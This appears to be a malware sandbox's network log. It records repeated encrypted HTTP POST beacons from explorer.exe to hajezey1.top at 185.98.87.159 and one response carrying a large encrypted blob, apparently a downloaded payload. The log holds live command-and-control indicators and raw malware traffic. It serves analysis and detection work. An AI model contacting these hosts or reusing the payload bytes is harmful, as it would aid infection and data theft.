Oct 29, 2021 20:49:50.053956985 CEST	1453	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:49:50 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.4	49774	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:49:50.482923031 CEST	1459	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wijjlglvpi.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 181 Host: hajezey1.top
Oct 29, 2021 20:49:50.482948065 CEST	1459	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 9d 66 5d 02 c8 a1 c1 64 45 b9 9d 15 Data Ascii: 6152Ek\lwmwu$f]dET`RKH&WZsg$_+UM#A/vtO+ZR-Hq}>\J'-A\|k ~r
Oct 29, 2021 20:49:50.562341928 CEST	1459	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:49:50 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.4	49775	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:49:50.690589905 CEST	1460	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://chbebm.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 336 Host: hajezey1.top
Oct 29, 2021 20:49:50.690610886 CEST	1461	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 9a 66 5d 02 c8 a1 c1 64 43 bd cd 1f Data Ascii: 6152Ek\lwmwu$f]dCIb9KTL<j.:rKmm.DvLA(S_@8[>p#e,33PBtRb/sG%mT[\7UH"tB:x`fT5peYtfn\~3;
Oct 29, 2021 20:49:50.775800943 CEST	1462	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:49:50 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.4	49776	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:49:50.858268023 CEST	1487	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://foxbbmduqm.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 342 Host: hajezey1.top
Oct 29, 2021 20:49:50.858280897 CEST	1487	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 9b 66 5d 02 c8 a1 c1 64 23 d4 87 74 Data Ascii: 6152Ek\lwmwu$f]d#t3qdGop\cWbe6'b^(l@Ia)Rg~p\/$>D@y]Wl{}\1oQT{tF^Z:_%e}*7qmmw_)
Oct 29, 2021 20:49:50.934794903 CEST	1488	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:49:50 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.4	49777	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:49:51.018378973 CEST	1489	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uneqpmoi.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 198 Host: hajezey1.top
Oct 29, 2021 20:49:51.018390894 CEST	1490	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 98 66 5d 02 c8 a1 c1 64 41 dd 81 23 Data Ascii: 6152Ek\lwmwu$f]dA#,}4 Bza$#[lvg,k*SR4}J3hZSS\5"=4F@s'Z4e%<soe6I^
Oct 29, 2021 20:49:51.097420931 CEST	1491	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:49:51 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c d8 21 bd 40 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 67 74 d2 23 9f 87 cd 2b 80 78 51 a1 a2 8f 3c 08 d8 1c e0 32 02 50 08 08 d0 e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 81 8a 20 59 55 11 5c b8 e6 6e ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 81 ff cc 8a 40 d8 06 0e 45 87 1b 7d 87 f8 e0 04 89 f9 d4 57 80 90 70 89 ec 30 4d 6b 0e e1 a2 22 48 12 da 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 d3 e2 5f 96 da 19 d1 3a 2d 6e 44 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 99 84 4a 04 38 2d 77 14 2c d0 e8 b1 14 b9 76 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 e2 49 64 cd 25 5c 8d b7 73 24 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 f5 07 b2 be 34 56 9b 46 76 99 86 11 00 83 32 42 62 6f c9 ae 88 3b 95 36 e1 48 50 67 79 50 b8 81 be e6 81 de e3 75 6d 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 df f2 4a 0b 7d 54 7a 9c 6c 39 c0 a1 0c 5c 19 d6 63 95 be 07 3d da 9a 7e 05 22 7d e6 b2 68 60 b9 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af 5d c6 83 41 69 2f 14 b6 e8 95 19 6d 76 d6 60 83 70 56 3e 0f 60 7c aa 9f 50 54 0c f3 a6 eb 5a ed 33 bd 8a f1 7a 5b b4 18 20 5e 7a 14 f7 f2 26 2b e9 c4 ef 28 e8 98 eb e7 6c ba 25 8f fc da 14 79 a2 8e b9 08 90 bb 77 c6 19 2a 16 bf 43 b3 ea 3d b2 13 3b 35 02 1a 1b eb 22 f5 4e ad e8 16 83 83 6f d4 ed 3f ec c9 81 68 73 02 99 ea fc cd c3 05 d0 93 d3 23 39 01 c4 a5 c8 63 77 da 0b af bd d9 39 69 a1 99 9c 77 e8 0f 4e 8c da 06 b9 37 87 8c b4 26 b8 2c 58 32 77 6c 08 da f9 d2 eb 48 25 66 37 2d 2f f2 5e a5 27 48 84 89 ff 67 37 f9 bd a1 97 2b 86 f3 bd 98 bb 1f 77 c7 26 e1 39 c6 86 8e f0 09 af 63 9d 31 09 a8 50 13 30 7b 32 8c c9 e1 d5 c0 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 f8 3f d8 2c eb 53 43 ae 3b 97 e4 23 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da 07 22 bd c8 ac ef 3f ef b2 a9 a6 cc b4 02 47 71 f5 66 3c 3d d0 9f cb 67 14 d8 97 24 c8 b9 fc f0 d4 e8 57 2d 88 d5 74 61 b4 7b 69 ad 66 43 80 1c b7 16 db 64 73 98 f5 51 cf 39 c5 da 87 f1 7d 87 70 f3 35 43 50 11 00 ac 07 1d 02 c1 b9 5a 97 82 fd 11 41 a6 b2 84 35 ce 39 83 ce 85 91 3e 94 d4 54 e5 2f 62 a2 22 27 c6 b9 0a d7 d9 1b c5 89 10 ee 8b ba d7 62 47 d8 ae 85 3a 9d 9b e1 d5 f5 de 38 7f 98 92 ff b0 6a 05 8f a5 0a 9f 36 6f 03 62 53 b5 f8 80 99 8b 84 80 3f 1d b8 3a c0 b4 a7 a4 d0 91 46 e8 81 2f 0d 4d 76 00 94 23 94 b6 07 e8 9a 4a 17 7a c5 42 14 7e 24 a0 84 ba 8b 65 7d bb 8e da 3b 33 f2 82 6c 27 b4 e3 e4 ce fd 5f 98 3b c4 fe da 3d 8f f5 3f 78 14 42 7b f9 e8 f0 85 a5 46 e5 Data Ascii: 1f66S(SW\/iP"&&grq\|6?eIJ5~/ar"`g1Q5ih.Kw:i/+".]pW!RY8\|!@+%gt#+xQ<2P0YObyT=a'4 YU\nIXKg[Ge92)g z6@E}Wp0Mk"HI?o\|6NI[LeU[0z;+W~5=PVpGZlqV@q!Uvy_:-nD%GkKm@NQ>[J8-w,v"JG0Z"?kQTJMQId%\s$&Q#F<pvA>C/CbGB4VFv2Bbo;6HPgyPum6'NGc_,/DO9W%J}Tzl9\c=~"}h`1%@N!{K.iw]Ai/mv`pV>`\|PTZ3z[ ^z&+(l%yw*C=;5"No?hs#9cw9iwN7&,X2wlH%f7-/^'Hg7+w&9c1P0{2%#49FwX?,SC;#vddOU^=i=p.oj"?Gqf<=g$W-ta{ifCdsQ9}p5CPZA59>T/b"'bG:8j6obS?:F/Mv#JzB~$e};3l'_;=?xB{F
Oct 29, 2021 20:49:51.097445965 CEST	1492	IN	Data Raw: bb 63 eb 97 62 c6 70 d9 31 d3 48 45 72 08 8e c1 6c c4 f3 bc f0 be bf 3e 00 d0 91 8a 2d 55 76 8c 94 be 70 8d 45 69 a1 84 05 86 e8 c6 3a 1e 4e 30 c8 3f b1 dc a7 36 0d b4 24 76 f3 61 5f ca bd d3 75 2e 18 45 3b e3 34 16 54 57 74 48 8a 38 7a ea 35 51 Data Ascii: cbp1HErl>-UvpEi:N0?6$va_u.E;4TWtH8z5Q*b!F3A2 !Stw %OM:/GIaeuJYAU{l4\|Fs_B3D-BX-!,]1B]&?=mW46yH9e@
Oct 29, 2021 20:49:51.097462893 CEST	1494	IN	Data Raw: 67 72 a2 98 b8 d3 52 89 bc 8c 20 84 cb 39 fc d0 e5 ac f9 cf 3b 7a de 3e 42 79 15 7c ce b7 b1 a8 ea ad 57 95 52 5a 81 7f 29 c9 f9 dc 88 2f b7 bd fd 7d 0b 9e 67 da 03 2f dc ec 4f e6 ff 9b e3 76 f3 62 85 0b 6a ac a6 cd 84 a0 d4 12 ec 6d 80 c2 b0 b9 Data Ascii: grR 9;z>By\|WRZ)/}g/Ovbjm\|y~;m4Y`xxgoSfC6{N\-g2~*3g2g{N<OuR<>G[DsC_pl'^{\|ar)G0:RdqS=.
Oct 29, 2021 20:49:51.097480059 CEST	1495	IN	Data Raw: 7d da 8b 38 8a 86 13 07 48 99 59 83 3d 9b f5 8d 3f e3 1e 40 88 84 34 4b 44 80 0e ce a3 a7 b7 09 de 10 e6 b8 03 fa 38 17 c4 b2 b7 fd 6d 6c fe 88 6c 20 1d 9e 4d a6 62 69 b7 7a a1 6a f0 1c cf da 9c f1 64 6f 76 04 46 78 de dd 49 2b e1 b4 3e 8d 24 47 Data Ascii: }8HY=?@4KD8mll MbizjdovFxI+>$G~,@X!k*b)rG2IDAH)n(up&\|a%va7I^3/7A#5lIX!;RPi:Nx~(,qjSL\|QK oD!
Oct 29, 2021 20:49:51.097496986 CEST	1496	IN	Data Raw: eb 12 3a 1c 28 6e 5f 24 08 5b a5 35 8d 3e 23 75 c1 f7 3e b1 9a 0b d2 92 bb 22 10 1b 92 d7 78 53 f5 dc dd 4c b3 31 8d 8a 89 da b4 d0 4f 22 28 f1 dd ff 53 1a 2e c9 47 bd 1c 97 66 4c 84 55 b6 53 60 c7 a9 62 13 31 61 11 c8 31 2e 5e a8 63 f1 85 30 f7 Data Ascii: :(n_$[5>#u>"xSL1O"(S.GfLUS`b1a1.^c0dt\|R4>fEc5I$J3@2m04kwg?Ha"/3vSZ`.N@oY^].PKa~}~oV_cE3Lann4?IkpT\|Z
Oct 29, 2021 20:49:51.097513914 CEST	1498	IN	Data Raw: ef 57 94 45 f8 84 96 14 6f 74 5f 72 c0 3b e2 07 45 c1 3c d3 e5 ce a9 91 d0 32 e8 6f cd 2d f1 c0 66 c1 58 19 4a 13 c0 ca 13 28 29 b9 27 ab a8 32 ce f9 af 78 4f be 48 8a 74 17 1b 3c 00 c3 af 8a 2c e2 e1 39 ff c9 9e 0c 59 e4 be 6a 18 33 c1 b3 4c 2b Data Ascii: WEot_r;E<2o-fXJ()'2xOHt<,9Yj3L+h.~]~'lfeDzo=0bD?r2PV8gTSdHffs<WEEd/y]kdO]8?O_8{nA6$M)?u?q}rzJ'Op
Oct 29, 2021 20:49:51.097529888 CEST	1499	IN	Data Raw: 56 78 a0 d2 a2 49 6f 98 2a a1 84 fb d1 cf 69 a5 e5 cd d0 82 5e a7 51 e1 4f 80 6d 7a 14 85 48 7a b3 53 aa bb a6 dc 19 71 77 48 2a c5 5c cd 79 23 a9 f5 10 db c9 79 8f 57 36 37 54 df 58 c5 4e 13 8e cf c4 0c c4 9b 4b e3 51 5c 65 77 65 38 47 d3 87 14 Data Ascii: VxIoi^QOmzHzSqwH\y#yW67TXNKQ\ewe8Gg=Bkj_(h1H]Y&'<I4:C%5M]Z\L6gg<']uBk$@HNJY]#jm?2000ov<`;oG>g67k%jK/fH
Oct 29, 2021 20:49:51.097547054 CEST	1500	IN	Data Raw: a8 06 0d e8 7f 36 ac 98 7b a6 ba 34 16 c6 7d 81 b3 8c 7e 38 23 52 17 70 1d 15 9e d6 21 37 6e 61 71 d1 c1 b9 f7 0a d1 c6 ac d8 54 c3 92 ae f6 5a 93 7a 16 2f 14 d2 10 94 97 a7 54 57 be c0 ed 8e 85 63 f2 13 5b ca 46 a1 67 45 38 ae d8 46 a4 c3 68 bc Data Ascii: 6{4}~8#Rp!7naqTZz/TWc[FgE8FhsW-\SpH:.Zzz%m,xnZ!xBz9Wl#%Wrv@K,Xlhi $zZC:"D1[7TMq;/jZH2:>+BD
Oct 29, 2021 20:49:51.097563982 CEST	1502	IN	Data Raw: 70 ce c3 dc 47 33 dd 00 77 45 14 03 8c f0 3c ba bd 33 e1 ce ed 01 49 21 56 75 6a ac dd f8 b8 4a bc 5e b3 12 ae d5 21 c4 2b 71 57 e6 5b 28 9a 48 62 29 78 6c 46 82 34 bd 4d 64 79 14 b1 23 ce 19 76 b6 49 22 23 04 63 11 de d6 73 73 6b dd 23 c0 04 09 Data Ascii: pG3wE<3I!VujJ^!+qW[(Hb)xlF4Mdy#vI"#cssk#rr)2t&;Rv5gDM2hSEuud6\|m{Z9[.Fi=(H'E+GsV39(%@YFPQjoiIvU8abIsOTv<G6A
Oct 29, 2021 20:49:51.097579002 CEST	1503	IN	Data Raw: 31 f2 df 81 47 90 c0 26 f1 c3 34 6b ea 51 b7 be 41 2c b4 28 61 17 14 c6 fc d0 de d5 58 00 d4 35 31 dc 52 da f4 0b 45 6a d4 3b 8f 09 f8 15 1d 61 2e e0 21 8b f3 1a 1c 65 14 cd 5f 2b 10 f2 a2 26 90 3c 39 7f bb 38 66 62 02 e7 9b ea 69 4d 3c 8e fe 45 Data Ascii: 1G&4kQA,(aX51REj;a.!e_+&<98fbiM<E9#eJ@\dPYT]\ &g+rlgK@<Rq\|E}e;W("+x${WBLD ro--.suEz&%ui/\kMSL{r\|b
Oct 29, 2021 20:49:51.149182081 CEST	1510	IN	Data Raw: 5e ae 55 64 b9 22 9f b7 dd 7c b7 23 e8 8e c6 ed fc 8c 1e 15 44 14 13 3e f5 40 ab f1 a3 58 28 57 da 2b 77 3d ed ea 9d 47 8c 2e e7 80 a1 5f f5 de 62 dc b1 48 7e 87 39 df c7 72 3a fb 6f fc f2 92 5d df 76 21 c3 6d c0 df 94 e3 71 10 73 81 88 b7 18 8a Data Ascii: ^Ud"\|#D>@X(W+w=G._bH~9r:o]v!mqs:%vmC0/4wqE3Vd3~bSp?H>7J 9f Ou`$@>7N#fPa0/\|;"a7Pq{

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.4	49784	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:49:53.420375109 CEST	2328	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://iakfv.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 203 Host: hajezey1.top
Oct 29, 2021 20:49:53.420414925 CEST	2329	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 84 de 98 66 5d 02 c9 a1 c1 64 35 db 8d 71 Data Ascii: 6152Ek\lwmwu$f]d5q$jf4F&Z}U1BBMp;e{FvUhR`8A)*\+xyQ:9%{&NE?f%{Yy
Oct 29, 2021 20:49:53.501753092 CEST	2330	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:49:53 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.4	49786	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:49:53.589560032 CEST	2331	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hbocfb.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 338 Host: hajezey1.top
Oct 29, 2021 20:49:53.589574099 CEST	2331	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 99 66 5d 02 c8 a1 c1 64 2a c9 c0 22 Data Ascii: 6152Ek\lwmwu$f]d"+<eGwx\4Bka[24Xk2 {ZW7uq22U{3InI/gV!s2m',2s"29A-a L+x7aM#A
Oct 29, 2021 20:49:53.666496038 CEST	2336	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:49:53 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.4	49787	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:49:53.754618883 CEST	2338	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xnalq.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 208 Host: hajezey1.top
Oct 29, 2021 20:49:53.754638910 CEST	2338	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 96 66 5d 02 c8 a1 c1 64 10 9c d3 1b Data Ascii: 6152Ek\lwmwu$f]d#NppKxBcFP_w`=^J"X=M5tQ_1ZABZV\kk;=_0~k^x8`+iN2w
